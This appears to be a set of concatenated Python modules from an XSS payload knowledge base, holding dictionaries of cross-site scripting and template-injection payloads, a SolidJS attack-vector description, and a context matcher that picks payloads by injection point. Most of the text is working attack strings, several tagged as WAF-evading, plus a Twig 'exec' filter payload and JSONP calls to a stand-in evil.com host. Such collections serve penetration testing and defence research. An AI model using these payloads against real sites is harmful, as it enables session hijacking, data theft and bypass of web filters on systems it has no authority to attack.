        payload='$("body").html("<script>alert(1)</script>")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_055": PayloadEntry(
        payload='$("div").html("<img src=x onerror=alert(1)>")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_056": PayloadEntry(
        payload='$("img").attr("src","javascript:alert(1)")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_057": PayloadEntry(
        payload='$("a").attr("href","javascript:alert(1)")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_058": PayloadEntry(
        payload='$("iframe").attr("src","javascript:alert(1)")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_059": PayloadEntry(
        payload='$("body").append("<script>alert(1)</script>")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_060": PayloadEntry(
        payload='$("head").prepend("<script>alert(1)</script>")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_061": PayloadEntry(
        payload='$("body").on("click",function(){alert(1)})',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_062": PayloadEntry(
        payload='$("*").bind("mouseover",function(){alert(1)})',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_063": PayloadEntry(
        payload='$.getJSON("//evil.com/jsonp?callback=alert")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_064": PayloadEntry(
        payload='$.ajax({url:"//evil.com",dataType:"jsonp",jsonpCallback:"alert"})',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_065": PayloadEntry(
        payload='$.globalEval("alert(1)")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_066": PayloadEntry(
        payload='$.parseHTML("<script>alert(1)</script>").appendTo("body")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_067": PayloadEntry(
        payload='$.parseHTML("<img src=x onerror=alert(1)>").appendTo("body")',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_068": PayloadEntry(
        payload="[script]alert(1)[/script]",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_069": PayloadEntry(
        payload='[iframe src="javascript:alert(1)"]',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_070": PayloadEntry(
        payload="<!--<script>alert(1)</script>-->",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_071": PayloadEntry(
        payload='[gallery id="<script>alert(1)</script>"]',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_072": PayloadEntry(
        payload='[caption id="<script>alert(1)</script>"]',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_073": PayloadEntry(
        payload="[embed]<script>alert(1)</script>[/embed]",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_074": PayloadEntry(
        payload="{{alert(1)}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_075": PayloadEntry(
        payload="<%=alert(1)%>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_076": PayloadEntry(
        payload='" onload="alert(1)" "',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_077": PayloadEntry(
        payload='{{7*7}}{{_context.request.query.get("callback")}}',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_078": PayloadEntry(
        payload="{{dump(app)}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_079": PayloadEntry(
        payload='{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("alert(1)")}}',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_080": PayloadEntry(
        payload="[javascript:alert(1)]",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_081": PayloadEntry(
        payload="[filter:javascript:alert(1)]",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_082": PayloadEntry(
        payload="[filter:eval:alert(1)]",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_083": PayloadEntry(
        payload="{{7*7}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_084": PayloadEntry(
        payload="{{config}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
}



#!/usr/bin/env python3

"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Created
Telegram: https://t.me/EasyProTech

SolidJS Context - Data Module
"""

DESCRIPTION = """
SolidJS is a reactive JavaScript framework.
Vulnerabilities occur when user input is injected into SolidJS components,
signals, or effects, allowing XSS attacks.

Vulnerability occurs when:
- User-controlled data is injected into SolidJS components
- Signals contain unsanitized input
- Effects process user input unsafely
- dangerouslySetInnerHTML uses user input
- JSX expressions evaluate user input

Common injection points:
- SolidJS component props
- dangerouslySetInnerHTML
- Signal values
- Effect functions
- JSX template expressions
"""

ATTACK_VECTOR = """
1. Component prop injection:
   <Component prop={USER_INPUT} />

2. dangerouslySetInnerHTML:
   <div innerHTML={USER_INPUT} />

3. Template injection:
   <div>{USER_INPUT}</div>

4. Signal injection:
   const [value, setValue] = createSignal(USER_INPUT);

5. Effect injection:
   createEffect(() => {
       document.body.innerHTML = USER_INPUT;
   });
"""

REMEDIATION = """
1. Never use innerHTML with user input
2. Sanitize all user input before rendering
3. Validate SolidJS component props
4. Use Content Security Policy (CSP)
5. Escape HTML entities in user-controlled content
6. Audit all SolidJS components for user input
7. Validate signal values
8. Use framework-safe methods for rendering
"""



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

View Transitions API XSS Payloads

View Transitions API allows creating smooth transitions between pages.
Can be used for XSS via callback functions and DOM manipulation.

Refactored into 2 parts for better maintainability.
"""

from .brs_kb_view_transitions_part1 import VIEW_TRANSITIONS_API_PAYLOADS_PART1
from .brs_kb_view_transitions_part2 import VIEW_TRANSITIONS_API_PAYLOADS_PART2


VIEW_TRANSITIONS_API_PAYLOADS = {
    **VIEW_TRANSITIONS_API_PAYLOADS_PART1,
    **VIEW_TRANSITIONS_API_PAYLOADS_PART2,
}

VIEW_TRANSITIONS_API_TOTAL_PAYLOADS = len(VIEW_TRANSITIONS_API_PAYLOADS)



#!/usr/bin/env python3

"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-26 UTC
Status: Created
Telegram: https://t.me/EasyProTech

Context Matcher.
Detects injection context from response analysis.

This is what makes BRS-KB context-aware. Not guessing - analyzing.
"""

import re
from dataclasses import dataclass
from enum import Enum
from typing import Dict, List, Optional


class ContextType(str, Enum):
    """High-level context categories."""

    HTML = "html"
    JAVASCRIPT = "javascript"
    CSS = "css"
    URL = "url"
    JSON = "json"
    XML = "xml"
    TEMPLATE = "template"
    API = "api"
    UNKNOWN = "unknown"


@dataclass
class ContextDetection:
    """
    Detected injection context.

    Attributes:
        context: Specific context name (e.g., "html_attribute")
        context_type: High-level category
        confidence: Detection confidence (0.0-1.0)
        position: Position in response where detected
        evidence: What triggered the detection
        recommended_payloads: Suggested payload tags
    """

    context: str
    context_type: ContextType
    confidence: float
    position: int
    evidence: str
    recommended_payloads: List[str]

    def __repr__(self) -> str:
        return f"Context({self.context}, conf={self.confidence:.2f})"


class ContextMatcher:
    """
    Matches injection points to contexts.

    Given a response and injection point, determines the most likely
    context for successful XSS execution.

    This is the bridge between detection and exploitation.

    Usage:
        matcher = ContextMatcher()
        contexts = matcher.detect(response, injection_marker)
        # Returns sorted list of ContextDetection
    """

    # Context detection patterns
    PATTERNS: Dict[str, Dict] = {
        # HTML contexts
        "html_content": {
            "type": ContextType.HTML,
            "patterns": [
                r"<[a-z]+[^>]*>[^<]*MARKER[^<]*<",
                r">MARKER<",
            ],
            "confidence": 0.9,
            "payloads": ["html", "script", "event"],
        },
        "html_attribute": {
            "type": ContextType.HTML,
            "patterns": [
                r'<[a-z]+[^>]*\s[a-z-]+=["\'][^"\']*MARKER[^"\']*["\']',
                r"<[a-z]+[^>]*\s[a-z-]+=MARKER",
            ],
            "confidence": 0.95,
            "payloads": ["attribute", "event", "javascript"],
        },
        "html_comment": {
            "type": ContextType.HTML,
            "patterns": [
                r"<!--[^>]*MARKER[^>]*-->",
            ],
            "confidence": 0.85,
            "payloads": ["comment_breakout"],
        },
        "html_tag_name": {
            "type": ContextType.HTML,
            "patterns": [
                r"<MARKER[^>]*>",
                r"</MARKER>",
            ],
            "confidence": 0.7,
            "payloads": ["tag_injection"],
        },
        # JavaScript contexts
        "js_string": {
            "type": ContextType.JAVASCRIPT,
            "patterns": [
                r'["\'][^"\']*MARKER[^"\']*["\']',
                r"`[^`]*MARKER[^`]*`",
            ],
            "confidence": 0.9,
            "payloads": ["string_breakout", "template_literal"],
        },
        "javascript": {
            "type": ContextType.JAVASCRIPT,
            "patterns": [
                r"<script[^>]*>[^<]*MARKER[^<]*</script>",
                r"javascript:[^\"']*MARKER",
            ],
            "confidence": 0.95,
            "payloads": ["javascript", "script_injection"],
        },
        "js_object": {
            "type": ContextType.JAVASCRIPT,
            "patterns": [
                r"\{[^}]*MARKER[^}]*\}",
                r":\s*MARKER\s*[,}]",
            ],
            "confidence": 0.8,
            "payloads": ["object_injection", "prototype"],
        },
        # DOM XSS via JavaScript execution sinks (CRITICAL)
        "dom_xss_eval": {
            "type": ContextType.JAVASCRIPT,
            "patterns": [
                r"eval\s*\([^)]*MARKER",
                r"setTimeout\s*\(['\"][^'\"]*MARKER",
                r"setInterval\s*\(['\"][^'\"]*MARKER",
                r"Function\s*\([^)]*MARKER",
                r"new\s+Function\s*\([^)]*MARKER",
            ],
            "confidence": 0.98,
            "payloads": ["code_execution", "eval_breakout", "timer_injection"],
        },
        # URL contexts
        "url": {
            "type": ContextType.URL,
            "patterns": [
                r'href=["\'][^"\']*MARKER[^"\']*["\']',
                r'src=["\'][^"\']*MARKER[^"\']*["\']',
                r'action=["\'][^"\']*MARKER[^"\']*["\']',
            ],
            "confidence": 0.9,
            "payloads": ["url", "javascript", "data_uri"],
        },
        "url_injection": {
            "type": ContextType.URL,
            "patterns": [
                r"\?[^#]*MARKER",
                r"#.*MARKER",
            ],
            "confidence": 0.75,
            "payloads": ["url_param", "fragment"],
        },
        # CSS contexts
        "css": {
            "type": ContextType.CSS,
            "patterns": [
                r"<style[^>]*>[^<]*MARKER[^<]*</style>",
                r'style=["\'][^"\']*MARKER[^"\']*["\']',
            ],
            "confidence": 0.85,
            "payloads": ["css", "expression"],
        },
        # JSON contexts
        "json_context": {
            "type": ContextType.JSON,
            "patterns": [
                r'"[^"]*":\s*"[^"]*MARKER[^"]*"',
                r'"[^"]*":\s*MARKER\s*[,}]',
            ],
            "confidence": 0.9,
            "payloads": ["json", "json_breakout"],
        },
        # Template contexts
        "template_context": {
            "type": ContextType.TEMPLATE,
            "patterns": [
                r"\{\{[^}]*MARKER[^}]*\}\}",  # Angular/Vue/Handlebars
                r"\$\{[^}]*MARKER[^}]*\}",  # Template literals
                r"<%[^%]*MARKER[^%]*%>",  # EJS/ERB
            ],
            "confidence": 0.95,
            "payloads": ["template", "ssti"],
        },
        # API contexts
        "graphql_query": {
            "type": ContextType.API,
            "patterns": [
                r'"query"\s*:\s*"[^"]*MARKER',
                r"query\s*\{[^}]*MARKER",
            ],
            "confidence": 0.9,
            "payloads": ["graphql"],
        },
        "websocket_message": {
            "type": ContextType.API,
            "patterns": [
                r'"type"\s*:\s*"[^"]*MARKER',
            ],
            "confidence": 0.7,
            "payloads": ["websocket"],
        },
        # SVG/XML contexts
        "svg": {
            "type": ContextType.XML,
            "patterns": [
                r"<svg[^>]*>[^<]*MARKER",
                r"<[a-z]+:svg[^>]*>",
            ],
            "confidence": 0.9,
            "payloads": ["svg", "xml"],
        },
        "xml_context": {
            "type": ContextType.XML,
            "patterns": [
                r"<\?xml[^>]*\?>.*MARKER",
            ],
            "confidence": 0.85,
            "payloads": ["xml", "xxe"],
        },
    }

    def __init__(self, marker: str = "MARKER"):
        """
        Initialize context matcher.

        Args:
            marker: The injection marker to look for in responses
        """
        self.marker = marker
        self._compiled_patterns: Dict[str, List[re.Pattern]] = {}
        self._compile_patterns()

    def _compile_patterns(self) -> None:
        """Pre-compile regex patterns for performance."""
        for context, config in self.PATTERNS.items():
            self._compiled_patterns[context] = [
                re.compile(p.replace("MARKER", re.escape(self.marker)), re.IGNORECASE | re.DOTALL)
                for p in config["patterns"]
            ]

    def detect(
        self,
        response: str,
        injection_value: Optional[str] = None,
    ) -> List[ContextDetection]:
        """
        Detect injection context from response.

        Args:
            response: The HTTP response body
            injection_value: Optional specific value to look for (instead of marker)

        Returns:
            List of ContextDetection sorted by confidence (highest first)
        """
        if injection_value:
            # Replace actual injection value with marker for detection
            response = response.replace(injection_value, self.marker)

        detections: List[ContextDetection] = []

        for context_name, config in self.PATTERNS.items():
            patterns = self._compiled_patterns[context_name]

            for pattern in patterns:
                match = pattern.search(response)
                if match:
                    detections.append(
                        ContextDetection(
                            context=context_name,
                            context_type=config["type"],
                            confidence=config["confidence"],
                            position=match.start(),
                            evidence=match.group(0)[:100],  # First 100 chars
                            recommended_payloads=config["payloads"],
                        )
                    )
                    break  # One match per context is enough

        # Sort by confidence
        detections.sort(key=lambda x: x.confidence, reverse=True)

        return detections

    def detect_all_positions(
        self,
        response: str,
        injection_value: str,
    ) -> Dict[int, ContextDetection]:
        """
        Detect context for each occurrence of injection value.

        Args:
            response: The HTTP response body
            injection_value: The value to find

        Returns:
            Dictionary mapping position -> ContextDetection
        """
        positions = {}
        start = 0

        while True:
            pos = response.find(injection_value, start)
            if pos == -1:
                break

            # Analyze context around this position
            window_start = max(0, pos - 100)
            window_end = min(len(response), pos + len(injection_value) + 100)
            window = response[window_start:window_end]

            # Replace injection value with marker in window
            window_with_marker = window.replace(injection_value, self.marker, 1)

            detections = self.detect(window_with_marker)
            if detections:
                positions[pos] = detections[0]  # Highest confidence

            start = pos + 1

        return positions

    def get_recommended_contexts(self, response_snippet: str) -> List[str]:
        """
        Quick analysis of response snippet for context hints.

        Returns list of context names that might apply.
        """
        contexts = []

        # Simple heuristics
        if "<script" in response_snippet.lower():
            contexts.append("javascript")
        if "{{" in response_snippet or "${" in response_snippet:
            contexts.append("template_context")
        if "<svg" in response_snippet.lower():
            contexts.append("svg")
        if "application/json" in response_snippet.lower() or response_snippet.strip().startswith(
            "{"
        ):
            contexts.append("json_context")
        if "<style" in response_snippet.lower() or "style=" in response_snippet.lower():
            contexts.append("css")

        return contexts if contexts else ["html_content"]  # Default



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Deep Memory XSS Payloads - Part 1
HTML parsing quirks, JavaScript engine quirks, and rare event handlers.
"""

from ..models import PayloadEntry


BRS_KB_DEEP_MEMORY_PAYLOADS_PART1 = {
    # ============================================================
    # OBSCURE HTML PARSING QUIRKS
    # ============================================================
    "html-quirk-p-autoclosure": PayloadEntry(
        payload="<p><script>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="P tag auto-closes before script",
        tags=["html", "quirk", "parsing"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html-quirk-table-foster": PayloadEntry(
        payload="<table><script>alert(1)</script></table>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Foster parenting script outside table",
        tags=["html", "quirk", "foster"],
        bypasses=["table_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html-quirk-form-nested": PayloadEntry(
        payload="<form id=x></form><form><input form=x onfocus=alert(1) autofocus>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Form attribute outside form",
        tags=["html", "quirk", "form"],
        bypasses=["form_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html-quirk-image-tag": PayloadEntry(
        payload="<image src=x onerror=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="IMAGE tag treated as IMG",
        tags=["html", "quirk", "image"],
        bypasses=["img_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html-quirk-keygen": PayloadEntry(
        payload="<keygen onfocus=alert(1) autofocus>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Keygen element (deprecated but parsed)",
        tags=["html", "quirk", "keygen"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["firefox"],
        reliability="low",
    ),
    "html-quirk-menuitem": PayloadEntry(
        payload="<menu><menuitem onclick=alert(1)>X</menuitem></menu>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Menuitem element (Firefox)",
        tags=["html", "quirk", "menuitem"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["firefox"],
        reliability="low",
    ),
    # ============================================================
    # JAVASCRIPT ENGINE QUIRKS
    # ============================================================
    "js-quirk-with-proxy": PayloadEntry(
        payload="with(new Proxy({},{has:()=>!alert(1)}))x",
        contexts=["javascript"],
        severity="high",
        cvss_score=7.5,
        description="With statement with Proxy has trap",
        tags=["javascript", "quirk", "proxy"],
        bypasses=["with_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "js-quirk-label-break": PayloadEntry(
        payload="x:{alert(1);break x}",
        contexts=["javascript"],
        severity="high",
        cvss_score=7.5,
        description="Labeled statement with break",
        tags=["javascript", "quirk", "label"],
        bypasses=["syntax_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "js-quirk-comma-sequence": PayloadEntry(
        payload="1,alert(1)",
        contexts=["javascript"],
        severity="high",
        cvss_score=7.5,
        description="Comma operator sequence",
        tags=["javascript", "quirk", "comma"],
        bypasses=["expression_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "js-quirk-void-expression": PayloadEntry(
        payload="void alert(1)",
        contexts=["javascript"],
        severity="high",
        cvss_score=7.5,
        description="Void operator expression",
        tags=["javascript", "quirk", "void"],
        bypasses=["keyword_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "js-quirk-not-not": PayloadEntry(
        payload="!!alert(1)",
        contexts=["javascript"],
        severity="high",
        cvss_score=7.5,
        description="Double negation",
        tags=["javascript", "quirk", "boolean"],
        bypasses=["expression_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "js-quirk-plus-plus": PayloadEntry(
        payload="+alert(1)",
        contexts=["javascript"],
        severity="high",
        cvss_score=7.5,
        description="Unary plus operator",
        tags=["javascript", "quirk", "unary"],
        bypasses=["expression_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "js-quirk-tilde": PayloadEntry(
        payload="~alert(1)",
        contexts=["javascript"],
        severity="high",
        cvss_score=7.5,
        description="Bitwise NOT operator",
        tags=["javascript", "quirk", "bitwise"],
        bypasses=["expression_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    # ============================================================
    # RARE EVENT HANDLERS (OFTEN FORGOTTEN)
    # ============================================================
    "event-onwheel": PayloadEntry(
        payload='<div onwheel="alert(1)" style="height:100px;overflow:scroll">scroll</div>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Onwheel event (scroll wheel)",
        tags=["event", "onwheel"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "event-onscrollend": PayloadEntry(
        payload='<div onscrollend="alert(1)" style="height:50px;overflow:scroll"><div style="height:200px"></div></div>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Onscrollend event (new)",
        tags=["event", "onscrollend"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox"],
        reliability="high",
    ),
    "event-onsecuritypolicyviolation": PayloadEntry(
        payload='<div onsecuritypolicyviolation="alert(1)">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="CSP violation event handler",
        tags=["event", "csp", "violation"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    "event-onslotchange": PayloadEntry(
        payload='<x-x><div slot=x onslotchange="alert(1)"></div></x-x>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Web Component slot change event",
        tags=["event", "slot", "webcomponent"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    "event-onformdata": PayloadEntry(
        payload='<form onformdata="alert(1)"><input type=submit>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="FormData event handler",
        tags=["event", "formdata"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "event-onauxclick": PayloadEntry(
        payload='<div onauxclick="alert(1)">middle click</div>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Auxiliary (middle) click event",
        tags=["event", "auxclick"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "event-oncontextmenu": PayloadEntry(
        payload='<div oncontextmenu="alert(1)">right click</div>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Context menu (right click) event",
        tags=["event", "contextmenu"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "event-oncopy": PayloadEntry(
        payload='<input oncopy="alert(1)" value="copy me">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Copy event handler",
        tags=["event", "copy"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "event-oncut": PayloadEntry(
        payload='<input oncut="alert(1)" value="cut me">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Cut event handler",
        tags=["event", "cut"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "event-onpaste": PayloadEntry(
        payload='<input onpaste="alert(1)">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Paste event handler",
        tags=["event", "paste"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "event-ondragstart": PayloadEntry(
        payload='<div draggable="true" ondragstart="alert(1)">drag me</div>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Drag start event",
        tags=["event", "drag"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "event-ondrop": PayloadEntry(
        payload='<div ondrop="alert(1)" ondragover="event.preventDefault()">drop here</div>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Drop event handler",
        tags=["event", "drop"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "event-onpointerdown": PayloadEntry(
        payload='<div onpointerdown="alert(1)">touch/click</div>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Pointer down (unified input) event",
        tags=["event", "pointer"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "event-ongotpointercapture": PayloadEntry(
        payload='<div ongotpointercapture="alert(1)">capture</div>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Pointer capture event",
        tags=["event", "pointer", "capture"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="medium",
    ),
    "event-onselectionchange": PayloadEntry(
        payload='<input onselectionchange="alert(1)" value="select me">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Selection change event",
        tags=["event", "selection"],
        bypasses=["event_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
}
